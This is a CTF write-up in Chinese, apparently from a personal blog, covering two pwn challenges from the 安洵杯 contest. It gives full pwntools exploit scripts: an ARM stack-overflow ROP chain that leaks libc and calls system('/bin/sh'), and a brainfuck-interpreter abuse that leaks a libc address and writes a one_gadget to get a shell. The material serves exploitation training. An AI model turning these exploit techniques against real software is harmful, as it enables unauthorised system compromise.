安洵杯WP

太菜了,最后一个0解题不会,只会前两个被人打烂的。

  • babyarm

    Arm架构的栈溢出,先换表base64解密一下,可以解出来应该输入的字符串是s1mpl3Dec0d4r,然后就是32位的溢出,exp如下:

    from pwn import *

    # Target connection plus the ELF/libc handles that the rest of the script
    # resolves symbols from. The local-process line is kept disabled.
    #io = process("./chall")
    io = remote("47.108.29.107",10392)
    elf = ELF("./chall")
    # libc shipped with the challenge; every libc offset below is read from it.
    libc = ELF("./libc-2.27.so")

    def input_pass():
        """Answer the ``msg>`` prompt with the recovered password string.

        Uses the global ``io`` tube; the value is the string decoded from the
        custom-alphabet base64 mentioned in the write-up.
        """
        io.sendlineafter("msg> ","s1mpl3Dec0d4r")

    def overflow(payload):
        """Send ``payload`` (bytes) at the ``comment>`` prompt.

        This is the input that overruns the stack buffer; the caller builds
        the padding and the return-address chain.
        """
        io.sendlineafter("comment> ",payload)

    # Addresses used by both chains. The gadget/main addresses are absolute
    # 0x10xxx values typed in by hand, which suggests a non-PIE build; that
    # cannot be confirmed from this listing alone.
    read_got = elf.got["read"]      # GOT slot whose contents are printed to leak libc
    puts_plt = elf.plt["puts"]      # function used to print the GOT entry
    #main_addr = elf.symbols["__libc_start_main"]
    main_addr = 0x1050C             # hard-coded instead of resolved via elf.symbols; appended after each chain
    # Gadget addresses; the names describe the register effect the author
    # relied on (pop r3/pc, pop r4-r7/..., mov r0,r7) — not verifiable here.
    pop_r3_pc = 0x10464
    pop_r4_r5_r6_r7 = 0x10cb0
    mov_r0_r7 = 0x10ca0

    input_pass()

    # Stage 1: 0x2c bytes of padding, then a chain that loads r7 with the
    # address of read@got and r3 with puts@plt before jumping to the
    # mov r0,r7 gadget, so puts() prints the resolved address of read().
    # The three 0xdeadbeef words on either side of read_got fill registers
    # the pop gadget loads but the chain does not use (register order is
    # assumed from the gadget name — confirm against the disassembly).
    payload = b'a'*(0x2c) + p32(pop_r4_r5_r6_r7) + p32(0xdeadbeef)*3 + p32(read_got) + p32(0xdeadbeef)*3 + p32(pop_r3_pc) + p32(puts_plt) + p32(mov_r0_r7) + p32(main_addr)*0x10

    overflow(payload)

    # NOTE(review): this takes the first 4 bytes of whatever arrives next and
    # assumes they are the puts() output; any other text sent before it
    # (a prompt, a newline) would corrupt the leak — confirm on a local run.
    libc_base = u32(io.recv()[0:4])
    libc_base = libc_base - libc.symbols["read"]   # leaked read() minus its libc offset
    success("libc base is leaked ==> " + hex(libc_base))

    sys_addr = libc_base + libc.symbols["system"]
    bin_sh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))

    # Stage 2: identical chain shape, now r7 = "/bin/sh" string and
    # r3 = system, i.e. system("/bin/sh").
    payload = b'a'*(0x2c) + p32(pop_r4_r5_r6_r7) + p32(0xdeadbeef)*3 + p32(bin_sh_addr) + p32(0xdeadbeef)*3 + p32(pop_r3_pc) + p32(sys_addr) + p32(mov_r0_r7) + p32(main_addr)*0x10

    # The program was returned into main_addr by stage 1, so the prompts
    # repeat and the password has to be entered again.
    input_pass()
    overflow(payload)

    io.interactive()
  • babybf

    brainfuck的解释器,brainfuck的操作格式为:

    操作码 含义
    > ptr +=1
    < ptr -= 1
    + (*ptr) += 1
    - (*ptr) -= 1
    . putchar(*ptr)
    , *ptr = getchar()

    操作的是rbp-0xA8,那么先用>来加,然后putchar输出__libc_start_main+231的地址,然后再通过getchar读入one_gadget即可,exp如下:

    from pwn import *
    # Target connection and ELF/libc handles. The local-process line is kept
    # disabled. NOTE(review): host and port are identical to the babyarm
    # script above — presumably a copy-paste leftover; confirm the babybf port.
    #io = process("./chall")
    io = remote("47.108.29.107",10392)

    elf = ELF("./chall")
    libc = ELF("./libc-2.27.so")   # libc shipped with the challenge

    context.arch = "amd64"
    # Debug-level logging dumps every byte sent/received; noisy but useful
    # while verifying the leak.
    context.log_level = "debug"

    def length(leng):
        """Answer the ``len>`` prompt with the decimal program length.

        Sent without a trailing newline (``sendafter``), so the service must
        read the number without waiting for one — verify if a local run hangs.
        """
        io.sendafter("len> ",str(leng))

    def code(co):
        """Send the brainfuck program ``co`` (bytes) at the ``code>`` prompt."""
        io.sendafter("code> ",co)

    # Brainfuck opcodes as byte values.
    # NOTE: the variable names are inverted relative to the table above:
    # ``add``/``minus`` are ``>``/``<`` (move the data pointer), while
    # ``ptr_add``/``ptr_minuns`` are ``+``/``-`` (change the current cell).
    add = 0x3e # >
    minus = 0x3c # <
    ptr_add = 0x2b # +
    ptr_minuns = 0x2d # -
    putchar = 0x2e # .
    getchar = 0x2c # ,
    nop = 0x0    # byte with no brainfuck meaning; used as a terminator below

    # Leak: advance the data pointer 0x58 cells, print one byte, then
    # "advance, print" seven more times — eight consecutive stack bytes.
    # The write-up says the pointer starts at rbp-0xA8 and the printed
    # qword is __libc_start_main+231; the exact 0x58 offset is not derivable
    # from this listing.
    payload = p8(add)*0x58 + p8(putchar) + (p8(add) + p8(putchar))*7
    length(len(payload))
    code(payload)
    # Read up to the 0x7f high byte of the leaked pointer, keep the last 6
    # bytes, zero-extend to 8, then subtract the +231 return offset and the
    # symbol offset to get the libc base.
    libc_base = u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00')) - 231 - libc.symbols["__libc_start_main"]

    success("libc base is leaked ==>" + hex(libc_base))

    # Candidate one_gadget offsets for this libc-2.27; the first was tried
    # and left commented out, the second is the one used.
    #ogg = libc_base + 0x4f2a5
    ogg = libc_base + 0x4f302

    # Write: advance 0x38 cells, read one byte, then "advance, read" seven
    # more times — eight bytes written from stdin. The different offset from
    # the leak (0x38 vs 0x58) is not explained in the write-up.
    payload=p8(add)*0x38 + p8(getchar) + (p8(add) + p8(getchar))*7 + p8(nop)

    # NOTE(review): presumably left over from local debugging; with a
    # remote() tube these two lines are unlikely to attach to the challenge
    # process and the pause() will stall the run — confirm before reuse.
    gdb.attach(io)
    pause()

    length(len(payload))
    code(payload)

    # The eight getchar() reads consume these bytes in order.
    io.send(p64(ogg))

    io.interactive()
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2022-2023 h1J4cker